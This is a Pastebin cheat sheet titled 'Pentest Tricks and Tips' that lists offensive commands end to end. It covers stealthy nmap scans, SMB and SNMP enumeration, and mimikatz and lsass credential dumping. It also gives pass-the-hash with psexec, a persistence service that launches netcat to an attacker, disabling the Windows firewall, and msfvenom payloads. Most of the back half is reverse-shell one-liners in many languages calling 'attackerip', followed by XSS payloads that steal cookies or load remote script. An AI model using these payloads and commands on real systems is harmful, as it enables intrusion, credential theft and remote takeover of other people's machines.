Advertisement
opexxx

Pentest Tricks and Tips

Jun 12th, 2017
4,413
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 19.41 KB | None | 0 0
  1. Nmap Full Web Vulnerable Scan
  2.  
  3. cd /usr/share/nmap/scripts/
  4. wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz
  5. nmap -sS -sV --script=vulscan/vulscan.nse target
  6. nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target
  7. nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target
  8. nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target
  9. nmap -sV --script=vuln target
  10. nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target
  11.  
  12. Dirb Dir Bruteforce:
  13.  
  14. dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt
  15.  
  16. Nikto web server scanner
  17.  
  18. nikto -C all -h http://IP
  19.  
  20. WordPress Scanner
  21.  
  22. git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
  23. ./wpscan –url http://IP/ –enumerate p
  24.  
  25. HTTP Fingerprinting
  26.  
  27. wget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip
  28. cd httprint_301/linux/
  29. ./httprint -h http://IP -s signatures.txt
  30.  
  31. SKIP Fish Scanner
  32.  
  33. skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP
  34.  
  35. Nmap Ports Scan
  36.  
  37. 1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)
  38. 1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)
  39. 2)fargement
  40. 3)data packed – like orginal one not scan packet
  41. 4)use auxiliary/scanner/ip/ipidseq for find zombie ip in network to use them to scan — nmap -sI ip target
  42. 5)nmap –source-port 53 target
  43. nmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -fmtu=24 –data-length=1337 -T2 target ( Randomize scan form diff IP)
  44. nmap -Pn -T2 -sV –randomize-hosts IP1,IP2
  45. nmap –script smb-check-vulns.nse -p445 target (using NSE scripts)
  46. nmap -sU -P0 -T Aggressive -p123 target (Aggresive Scan T1-T5)
  47. nmap -sA -PN -sN target
  48. nmap -sS -sV -T5 -F -A -O target (version detection)
  49. nmap -sU -v target (Udp)
  50. nmap -sU -P0 (Udp)
  51. nmap -sC 192.168.31.10-12 (all scan default)
  52.  
  53. NC Scanning
  54.  
  55. nc -v -w 1 target -z 1-1000
  56. for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done
  57.  
  58. Unicornscan
  59.  
  60. us -H -msf -Iv 192.168.56.101 -p 1-65535
  61. us -H -mU -Iv 192.168.56.101 -p 1-65535
  62.  
  63. -H resolve hostnames during the reporting phase
  64. -m scan mode (sf - tcp, U - udp)
  65. -Iv - verbose
  66.  
  67. Xprobe2 OS fingerprinting
  68.  
  69. xprobe2 -v -p tcp:80:open IP
  70.  
  71. Samba Enumeration
  72.  
  73. nmblookup -A target
  74. smbclient //MOUNT/share -I target -N
  75. rpcclient -U "" target
  76. enum4linux target
  77.  
  78. SNMP Enumeration
  79.  
  80. snmpget -v 1 -c public IP
  81. snmpwalk -v 1 -c public IP
  82. snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
  83.  
  84. Windows Useful cmds
  85.  
  86. net localgroup Users
  87. net localgroup Administrators
  88. search dir/s *.doc
  89. system("start cmd.exe /k $cmd")
  90. sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore
  91. /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
  92. mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
  93. Procdump.exe -accepteula -ma lsass.exe lsass.dmp
  94. mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
  95. C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp For 32 bits
  96. C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp For 64 bits
  97.  
  98. PuTTY Link tunnel
  99.  
  100. Forward remote port to local address
  101. plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 IP
  102.  
  103. Meterpreter portfwd
  104.  
  105. # https://www.offensive-security.com/metasploit-unleashed/portfwd/
  106. # forward remote port to local address
  107. meterpreter > portfwd add –l 3389 –p 3389 –r 172.16.194.141
  108. kali > rdesktop 127.0.0.1:3389
  109.  
  110. Enable RDP Access
  111.  
  112. reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
  113. netsh firewall set service remoteadmin enable
  114. netsh firewall set service remotedesktop enable
  115.  
  116. Turn Off Windows Firewall
  117.  
  118. netsh firewall set opmode disable
  119.  
  120. Meterpreter VNC\RDP
  121.  
  122. a
  123. # https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/
  124. run getgui -u admin -p 1234
  125. run vnc -p 5043
  126.  
  127. Add New user in Windows
  128.  
  129. net user test 1234 /add
  130. net localgroup administrators test /add
  131.  
  132. Mimikatz use
  133.  
  134. git clone https://github.com/gentilkiwi/mimikatz.git
  135. privilege::debug
  136. sekurlsa::logonPasswords full
  137.  
  138. Passing the Hash
  139.  
  140. git clone https://github.com/byt3bl33d3r/pth-toolkit
  141. pth-winexe -U hash //IP cmd
  142.  
  143. or
  144.  
  145. apt-get install freerdp-x11
  146. xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP
  147.  
  148. or
  149.  
  150. meterpreter > run post/windows/gather/hashdump
  151. Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
  152. msf > use exploit/windows/smb/psexec
  153. msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
  154. msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
  155. msf exploit(psexec) > exploit
  156. meterpreter > shell
  157.  
  158. Hashcat password cracking
  159.  
  160. hashcat -m 400 -a 0 hash /root/rockyou.txt
  161.  
  162. Netcat examples
  163.  
  164. c:> nc -l -p 31337
  165. #nc 192.168.0.10 31337
  166. c:> nc -v -w 30 -p 31337 -l < secret.txt
  167. #nc -v -w 2 192.168.0.10 31337 > secret.txt
  168.  
  169. Banner grabbing with NC
  170.  
  171. nc 192.168.0.10 80
  172. GET / HTTP/1.1
  173. Host: 192.168.0.10
  174. User-Agent: Mozilla/4.0
  175. Referrer: www.example.com
  176. <enter>
  177. <enter>
  178.  
  179. Window reverse shell
  180.  
  181. c:>nc -Lp 31337 -vv -e cmd.exe
  182. nc 192.168.0.10 31337
  183. c:>nc example.com 80 -e cmd.exe
  184. nc -lp 80
  185.  
  186. nc -lp 31337 -e /bin/bash
  187. nc 192.168.0.10 31337
  188. nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000
  189.  
  190. Find SUID\SGID root files
  191.  
  192. # Find SUID root files
  193. find / -user root -perm -4000 -print
  194.  
  195. # Find SGID root files:
  196. find / -group root -perm -2000 -print
  197.  
  198. # Find SUID and SGID files owned by anyone:
  199. find / -perm -4000 -o -perm -2000 -print
  200.  
  201. # Find files that are not owned by any user:
  202. find / -nouser -print
  203.  
  204. # Find files that are not owned by any group:
  205. find / -nogroup -print
  206.  
  207. # Find symlinks and what they point to:
  208. find / -type l -ls
  209.  
  210. Python shell
  211.  
  212. python -c 'import pty;pty.spawn("/bin/bash")'
  213.  
  214. Python\Ruby\PHP HTTP Server
  215.  
  216. python2 -m SimpleHTTPServer
  217. python3 -m http.server
  218. ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"
  219. php -S 0.0.0.0:8888
  220.  
  221. Get PIDs of process
  222.  
  223. fuser -nv tcp 80
  224. fuser -k -n tcp 80
  225.  
  226. Hydra rdp Bruteforce
  227.  
  228. hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp
  229.  
  230. Mount Remote Windows Share
  231.  
  232. smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
  233.  
  234. Compiling Exploit in Kali
  235.  
  236. gcc -m32 -o output32 hello.c (32 bit)
  237. gcc -m64 -o output hello.c (64 bit)
  238.  
  239. Compiling Windows Exploits on Kali
  240.  
  241. wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
  242. wine mingw-get-setup.exe
  243. select mingw32-base
  244. cd /root/.wine/drive_c/windows
  245. wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
  246. cd /root/.wine/drive_c/MinGW/bin
  247. wine gcc -o ability.exe /tmp/exploit.c -lwsock32
  248. wine ability.exe
  249.  
  250. NASM Commands
  251.  
  252. nasm -f bin -o payload.bin payload.asm
  253. nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload
  254.  
  255. SSH Pivoting
  256.  
  257. ssh -D 127.0.0.1:1080 -p 22 user@IP
  258. Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
  259. proxychains commands target
  260.  
  261. SSH Pivoting from One Network to Another
  262.  
  263. ssh -D 127.0.0.1:1080 -p 22 user1@IP1
  264. Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
  265. proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
  266. Add socks4 127.0.0.1 1081 in /etc/proxychains.conf
  267. proxychains commands target
  268.  
  269. Pivoting Using metasploit
  270.  
  271. route add X.X.X.X 255.255.255.0 1
  272. use auxiliary/server/socks4a
  273. run
  274. proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E
  275.  
  276. or
  277.  
  278. # https://www.offensive-security.com/metasploit-unleashed/pivoting/
  279. meterpreter > ipconfig
  280. IP Address  : 10.1.13.3
  281. meterpreter > run autoroute -s 10.1.13.0/24
  282. meterpreter > run autoroute -p
  283. 10.1.13.0          255.255.255.0      Session 1
  284. meterpreter > Ctrl+Z
  285. msf auxiliary(tcp) > use exploit/windows/smb/psexec
  286. msf exploit(psexec) > set RHOST 10.1.13.2
  287. msf exploit(psexec) > exploit
  288. meterpreter > ipconfig
  289. IP Address  : 10.1.13.2
  290.  
  291. Exploit-DB search using CSV File
  292.  
  293. git clone https://github.com/offensive-security/exploit-database.git
  294. cd exploit-database
  295. ./searchsploit –u
  296. ./searchsploit apache 2.2
  297. ./searchsploit "Linux Kernel"
  298.  
  299. cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep "<|<=" | sort -k3
  300.  
  301. MSF Payloads
  302.  
  303. msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exe
  304. msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 R > exploit.php
  305. msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -a x86 --platform win -f asp -o file.asp
  306. msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c
  307.  
  308. MSF Linux Reverse Meterpreter Binary
  309.  
  310. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell
  311.  
  312. MSF Reverse Shell (C Shellcode)
  313.  
  314. msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 --platform win -f c
  315.  
  316. MSF Reverse Shell Python Script
  317.  
  318. msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
  319.  
  320. MSF Reverse ASP Shell
  321.  
  322. msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp
  323.  
  324. MSF Reverse Bash Shell
  325.  
  326. msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh
  327.  
  328. MSF Reverse PHP Shell
  329.  
  330. msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.php
  331. add <?php at the beginning
  332. perl -i~ -0777pe's/^/<?php \n/' shell.php
  333.  
  334. MSF Reverse Win Bin
  335.  
  336. msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe
  337.  
  338. Linux Security Commands
  339.  
  340. # find programs with a set uid bit
  341. find / -uid 0 -perm -4000
  342.  
  343. # find things that are world writable
  344. find / -perm -o=w
  345.  
  346. # find names with dots and spaces, there shouldn’t be any
  347. find / -name " " -print
  348. find / -name ".." -print
  349. find / -name ". " -print
  350. find / -name " " -print
  351.  
  352. # find files that are not owned by anyone
  353. find / -nouser
  354.  
  355. # look for files that are unlinked
  356. lsof +L1
  357.  
  358. # get information about procceses with open ports
  359. lsof -i
  360.  
  361. # look for weird things in arp
  362. arp -a
  363.  
  364. # look at all accounts including AD
  365. getent passwd
  366.  
  367. # look at all groups and membership including AD
  368. getent group
  369.  
  370. # list crontabs for all users including AD
  371. for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done
  372.  
  373. # generate random passwords
  374. cat /dev/urandom| tr -dc ‘a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=’|fold -w 12| head -n 4
  375.  
  376. # find all immutable files, there should not be any
  377. find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’
  378.  
  379. # fix immutable files
  380. chattr -i file
  381.  
  382. Win Buffer Overflow Exploit Commands
  383.  
  384. msfvenom -p windows/shell_bind_tcp -a x86 --platform win -b "\x00" -f c
  385. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 --platform win -e x86/shikata_ga_nai -b "\x00" -f c
  386.  
  387. COMMONLY USED BAD CHARACTERS:
  388. \x00\x0a\x0d\x20                              For http request
  389. \x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c           Ending with (0\n\r_)
  390.  
  391. # Useful Commands:
  392. pattern create
  393. pattern offset (EIP Address)
  394. pattern offset (ESP Address)
  395. add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )
  396.  
  397. !pvefindaddr pattern_create 5000
  398. !pvefindaddr suggest
  399. !pvefindaddr modules
  400. !pvefindaddr nosafeseh
  401.  
  402. !mona config -set workingfolder C:\Mona\%p
  403. !mona config -get workingfolder
  404. !mona mod
  405. !mona bytearray -b "\x00\x0a"
  406. !mona pc 5000
  407. !mona po EIP
  408. !mona suggest
  409.  
  410. SEH - Structured Exception Handling
  411.  
  412. # https://en.wikipedia.org/wiki/Microsoft-specific_exception_handling_mechanisms#SEH
  413. !mona suggest
  414. !mona nosafeseh
  415. nseh="\xeb\x06\x90\x90" (next seh chain)
  416. iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)
  417.  
  418. ROP (DEP)
  419.  
  420. # https://en.wikipedia.org/wiki/Return-oriented_programming
  421. # https://en.wikipedia.org/wiki/Data_Execution_Prevention
  422. !mona modules
  423. !mona ropfunc -m *.dll -cpb "\x00\x09\x0a"
  424. !mona rop -m *.dll -cpb "\x00\x09\x0a" (auto suggest)
  425.  
  426. ASLR - Address space layout randomization
  427.  
  428. # https://en.wikipedia.org/wiki/Address_space_layout_randomization
  429. !mona noaslr
  430.  
  431. EGG Hunter techniques
  432.  
  433. # https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
  434. # http://www.fuzzysecurity.com/tutorials/expDev/4.html
  435. !mona jmp -r esp
  436. !mona egg -t lxxl
  437. \xeb\xc4 (jump backward -60)
  438. buff=lxxllxxl+shell
  439. !mona egg -t 'w00t'
  440.  
  441. GDB Debugger Commands
  442.  
  443. # Setting Breakpoint
  444. break *_start
  445.  
  446. # Execute Next Instruction
  447. next
  448. step
  449. n
  450. s
  451.  
  452. # Continue Execution
  453. continue
  454. c
  455.  
  456. # Data
  457. checking 'REGISTERS' and 'MEMORY'
  458.  
  459. # Display Register Values: (Decimal,Binary,Hex)
  460. print /d –> Decimal
  461. print /t –> Binary
  462. print /x –> Hex
  463. O/P :
  464. (gdb) print /d $eax
  465. $17 = 13
  466. (gdb) print /t $eax
  467. $18 = 1101
  468. (gdb) print /x $eax
  469. $19 = 0xd
  470. (gdb)
  471.  
  472. # Display values of specific memory locations
  473. command : x/nyz (Examine)
  474. n –> Number of fields to display ==>
  475. y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)
  476. z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)
  477.  
  478. BASH Reverse Shell
  479.  
  480. bash -i >& /dev/tcp/X.X.X.X/443 0>&1
  481.  
  482. exec /bin/bash 0&0 2>&0
  483. exec /bin/bash 0&0 2>&0
  484.  
  485. 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
  486.  
  487. 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
  488.  
  489. exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
  490. exec 5<>/dev/tcp/attackerip/4444
  491.  
  492. cat <&5 | while read line; do $line 2>&5 >&5; done # or:
  493. while read line 0<&5; do $line 2>&5 >&5; done
  494.  
  495. /bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
  496. /bin/bash -i > /dev/tcp/X.X.X.X/443 0<&1 2>&1
  497.  
  498. PERL Reverse Shell
  499.  
  500. perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
  501.  
  502. # for win platform
  503. perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
  504. perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’
  505.  
  506. RUBY Reverse Shell
  507.  
  508. ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
  509.  
  510. # for win platform
  511. ruby -rsocket -e 'c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
  512. ruby -rsocket -e 'f=TCPSocket.open("attackerip","443").to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
  513.  
  514. PYTHON Reverse Shell
  515.  
  516. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  517.  
  518. PHP Reverse Shell
  519.  
  520. php -r '$sock=fsockopen("attackerip",443);exec("/bin/sh -i <&3 >&3 2>&3");'
  521.  
  522. JAVA Reverse Shell
  523.  
  524. r = Runtime.getRuntime()
  525. p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
  526. p.waitFor()
  527.  
  528. NETCAT Reverse Shell
  529.  
  530. nc -e /bin/sh attackerip 4444
  531. nc -e /bin/sh 192.168.37.10 443
  532.  
  533. # If the -e option is disabled, try this
  534. # mknod backpipe p && nc attackerip 443 0<backpipe | /bin/bash 1>backpipe
  535. /bin/sh | nc attackerip 443
  536. rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4443 0/tmp/
  537.  
  538. # If you have the wrong version of netcat installed, try
  539. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f
  540.  
  541. TELNET Reverse Shell
  542.  
  543. # If netcat is not available or /dev/tcp
  544. mknod backpipe p && telnet attackerip 443 0<backpipe | /bin/bash 1>backpipe
  545.  
  546. XTERM Reverse Shell
  547.  
  548. # Start an open X Server on your system (:1 – which listens on TCP port 6001)
  549. apt-get install xnest
  550. Xnest :1
  551.  
  552. # Then remember to authorise on your system the target IP to connect to you
  553. xterm -display 127.0.0.1:1
  554.  
  555. # Run this INSIDE the spawned xterm on the open X Server
  556. xhost +targetip
  557.  
  558. # Then on the target connect back to the your X Server
  559. xterm -display attackerip:1
  560. /usr/openwin/bin/xterm -display attackerip:1
  561. or
  562. $ DISPLAY=attackerip:0 xterm
  563.  
  564. XSS Cheat Codes
  565.  
  566. https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
  567. ("< iframes > src=http://IP:PORT </ iframes >")
  568.  
  569. <script>document.location=http://IP:PORT</script>
  570.  
  571. ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//–></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  572.  
  573. ";!–"<XSS>=&amp;amp;{()}
  574.  
  575. <IMG SRC="javascript:alert('XSS');">
  576. <IMG SRC=javascript:alert('XSS')>
  577. <IMG """><SCRIPT>alert("XSS")</SCRIPT>"">
  578. <IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;>
  579.  
  580. <IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041>
  581. <IMG SRC="jav ascript:alert('XSS');">
  582.  
  583. perl -e 'print "<IMG SRC=javascript:alert(\"XSS\")>";' > out
  584.  
  585. <BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  586.  
  587. (">< iframes http://google.com < iframes >)
  588.  
  589. <BODY BACKGROUND="javascript:alert('XSS')">
  590. <FRAMESET><FRAME SRC=”javascript:alert('XSS');"></FRAMESET>
  591. "><script >alert(document.cookie)</script>
  592. %253cscript%253ealert(document.cookie)%253c/script%253e
  593. "><s"%2b"cript>alert(document.cookie)</script>
  594. %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E
  595. <img src=asdf onerror=alert(document.cookie)>
  596.  
  597. SSH Over SCTP (With Socat)
  598.  
  599. # on remote server
  600. # assuming you want the SCTP socket to listen on port 80/SCTP and sshd is on 22/TCP
  601. $ socat SCTP-LISTEN:80,fork TCP:localhost:22
  602.  
  603. # localhost
  604. # replace SERVER_IP with IP of listening server, and 80 with whatever port the SCTP listener is on :)
  605. $ socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80
  606.  
  607. # create socks proxy
  608. # replace username and -p port value as needed...
  609. $ ssh -lusername localhost -D 8080 -p 1337
  610.  
  611. Install Metasploit Community Edition in Kali 2.0
  612.  
  613. # github urls
  614. https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version
  615.  
  616. wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run && chmod
  617. +x metasploit-latest-linux-x64-installer.run && ./metasploit-latest-linux-x64-installer.run
  618.  
  619. # create user
  620. $ /opt/metasploit/createuser
  621. [*] Please enter a username: root
  622. [*] Creating user 'root' with password 'LsRRV[I^5' ...
  623.  
  624. # activate your metasploit license
  625. https://localhost:3790
  626.  
  627. # update metasploite
  628. $ /opt/metasploit/app/msfupdate
  629.  
  630. # use msfconsole
  631. $ /opt/metasploit/app/msfconsole
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement